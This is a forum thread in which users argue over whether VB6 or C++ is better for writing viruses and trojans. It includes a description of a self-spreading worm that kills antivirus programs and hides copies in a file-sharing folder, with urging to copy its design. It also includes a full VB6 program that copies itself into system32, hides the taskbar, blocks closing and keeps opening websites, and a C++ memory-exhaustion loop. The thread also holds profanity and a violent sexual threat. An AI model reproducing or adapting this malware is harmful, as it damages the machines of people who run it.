Jump to content

Featured Replies

Assembly can do everything tho :P

Think about it, compilers make your C++ code into assembly instructions before converting that to machine code

  • Replies 103
  • Views 1.8k
  • Created
  • Last Reply

Top Posters In This Topic

Assembly can do everything tho :P

Think about it, compilers make your C++ code into assembly instructions before converting that to machine code

 

it can do everything but its difficult. u can get lost really easily

Assembly can do everything tho :P

Think about it, compilers make your C++ code into assembly instructions before converting that to machine code

 

You dont have private or protected data members in assembly

 

HLL's have many protections and suchlike which you wont find in asm, and although these are discarded when compiling, doesnt mean they arent important :)

But they can be programmed in assembly..

Also why are we going on with this topic, it should just be closed :O_o:

  • 3 weeks later...
no prob man, at least someone here is decent enough to not be an ass hole ^_^ I commend you.

OMG rifk rifk rifk this is sooo fun3h

hmm.

 

here is what should end this thread and everyone should agree.

 

C++ is great....

 

if you:

 

1) want to spend 20 mins creating a form without the use of MFC.

 

2) Want to use DirectX, Injection of any kind.

 

3) Want Inline ASM.

 

VB6 is great.......

 

if you:

 

1) Want to be called names by e-penis users that think any language is 'below' C++

 

2) Want to use winsock or string manipulation.

 

3) want to make a trainer, bouncer, file editor, or trojan.

 

4) if you want your forms to look cooler then the program really is.

 

And in acuallity, these languages work well together.

 

write a DLL in C++ and call from it using VB6....problem solved.

 

(and termight if i hear anything about ANY .NET piece of garbage ill fucking rape your asshole.)

hmm.

 

here is what should end this thread and everyone should agree.

 

C++ is great....

 

if you:

 

1) want to spend 20 mins creating a form without the use of MFC.

 

2) Want to use DirectX, Injection of any kind.

 

3) Want Inline ASM.

 

VB6 is great.......

 

if you:

 

1) Want to be called names by e-penis users that think any language is 'below' C++

 

2) Want to use winsock or string manipulation.

 

3) want to make a trainer, bouncer, file editor, or trojan.

 

4) if you want your forms to look cooler then the program really is.

 

And in acuallity, these languages work well together.

 

write a DLL in C++ and call from it using VB6....problem solved.

 

(and termight if i hear anything about ANY .NET piece of garbage ill fucking rape your asshole.)

 

 

.NET is good because it solves the problem of DLL Hell, Ive heard many good things aobut how it blurrs the lines between VB and C++ and C#, having the .NET Architecture allows someone to make things with even more ease, you can write the heavy code, the C++ stuff, and then write a VB front end to it, which makes the GUI and event driven part of the application easier and then compile them together with ease. If your still good for raping =EO3=

VB is useless for viruses if you write a file infecter suddenly everything will need the vb runtimes to run :P.

 

Winsock is easy as hell in it tho, you might want to write a trojan.

You're no "haxor".

:bowrofl: :bowrofl: :wow: :rofl: :poke:

 

yeah i am 2 i hacked slashdot with my irc bnc and i used my icmp nuker because thats what real hackers use liek me

not too long ago i tested a virus/worm on my "test" computer, its old but with xp on it. the results were from getting it from limewire:

 

1. locks the alt-ctrl-del function and prevents it from being run by startmenu

2.scans tasks to see if certain programs are running such as pc-cillin norton-AV mcafee and AKG and executes the exit to them.

3. drops about 600 copies of it with different filenames and random filesizes. the filenames are like names of programs with different versions and words like crack serial and stuff like that.

4. those dropped copies are placed in "C:\My Shared Folder\" and are hidden so that people would download them and spread this virus/worm

5. it would then restart the computer without notice

 

If the dropped copies were found and deleted by the user the virus would drop them again at the next startup.

 

the only way to terminate the virus is to get a 3rd-party task manager and find it to delete it.

 

 

 

you should try and make your virus similar.

Writing a virus using VB?

Must be the dumbest thing I've ever heard.

 

 

Regards,

Matt J.

I guess noone knows what B.A.S.I.C really means.

 

It means: BEGINNERS All-purpose Symbolic Instruction Code.

 

Little Coding noobies....

not too long ago i tested a virus/worm on my "test" computer, its old but with xp on it. the results were from getting it from limewire:

 

1. locks the alt-ctrl-del function and prevents it from being run by startmenu

2.scans tasks to see if certain programs are running such as pc-cillin norton-AV mcafee and AKG and executes the exit to them.

3. drops about 600 copies of it with different filenames and random filesizes. the filenames are like names of programs with different versions and words like crack serial and stuff like that.

4. those dropped copies are placed in "C:\My Shared Folder\" and are hidden so that people would download them and spread this virus/worm

5. it would then restart the computer without notice

 

If the dropped copies were found and deleted by the user the virus would drop them again at the next startup.

 

the only way to terminate the virus is to get a 3rd-party task manager and find it to delete it.

 

 

 

you should try and make your virus similar.

 

 

Link plz?

I made this program.

It kills your ram very fast ;]

 

 

Private Sub Command1_Click()
ShellExecute hwnd, "open", "http://www.google.com", _
   vbNullString, vbNullString, SW_SHOWNORMAL
End Sub

Private Sub Form_Load()
Me.Caption = "Fucked up v(" & App.Major & "." & App.Minor & "." & App.Revision & ")"
random
Label1.FontSize = 6
Label1.Caption = "Let this be a lesson to you.  There are mean people out there that have no problems being malicous.  My origional intent was to add chingos of spyware, but then I realized that was just a tad too mean.  This seemed to be the better alternative." & vbNewLine & "                  -MathFuck"
launch.Enabled = True
opens.Enabled = True
recre.Enabled = True
spam.Enabled = True
hideit.Enabled = True
unhideit.Enabled = True

launch.Interval = 59000
opens.Interval = 3000
recre.Interval = 3000
spam.Interval = 23000
hideit.Interval = 22000
unhideit.Interval = 54000
End Sub

Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
Me.hide
MsgBox "But now I go deeper into the abyss"
End Sub

Private Sub hideit_Timer()
hide
End Sub

Private Sub launch_Timer()
ShellExecute hwnd, "open", "http://www.myg0t.com", _ 'for example
   vbNullString, vbNullString, SW_hide
End Sub

Private Sub opens_Timer()
ShellExecute hwnd, "open", "http://www.gaysex.com", _
   vbNullString, vbNullString, SW_SHOWNORMAL
End Sub

Private Sub recre_Timer()
random
End Sub

Private Sub spam_Timer()
MsgBox "You seem to be getting ram-fucked"
End Sub

Private Sub unhideit_Timer()
unhide
End Sub

---------------------

Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Const SWP_HIDEWINDOW = &H80
Const SWP_SHOWWINDOW = &H40

Public Function Rand(ByVal Low As Long, _
                    ByVal High As Long) As Long
 Rand = Int((High - Low + 1) * Rnd) + Low
End Function
Public Function random()
Dim name1 As Integer
Dim name2 As Integer
Dim name3 As Integer
name1 = Rand(1, 20000)
name2 = Rand(1, 20000)
name3 = Rand(1, 20000)

FileCopy App.EXEName & ".exe", "c:\windows\system32\" & name1 & name2 & name3 & ".exe"

End Function
Public Function hide()
Dim TaskBarHwnd As Long
TaskBarHwnd = FindWindow("Shell_traywnd", "")
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_HIDEWINDOW)
End Function
Public Function unhide()
Dim TaskBarHwnd2 As Long
TaskBarHwnd2 = FindWindow("Shell_traywnd", "")

End Function

ok even though i have been riding the VB is winner bandwagon with termight im going to take a break for this post

 

main()
{
for (;;)
{
new long;
}

return 0;
}

 

c++ wins

VB could easily write a virus it has access to the same api' sas C,C++, but due to large file size and runtimes it wouldnt be too good.
But it also relys on vb runtimes, and asking someone to please go download runtimes to run my virus isn't going to fly.

Both malicious code examples are not just totally impractical (Especially the VB junk), but are about as efficent as using a pair of scissors to mow the lawn.

 

The first example is just putting VB's head back under the desk, further proving how worthless the language really is (Along with the morons who use it).

 

And the second just gives C++ a bad name. Using the 'new' operator.... WHAT THE FUCK ARE YOU THINKING?

 

 

Regards,

Matt J.

And the second just gives C++ a bad name. Using the 'new' operator.... WHAT THE FUCK ARE YOU THINKING?

i was thinking id stick el mucho stuffo on the heap :stupid:

Guest
This topic is now closed to further replies.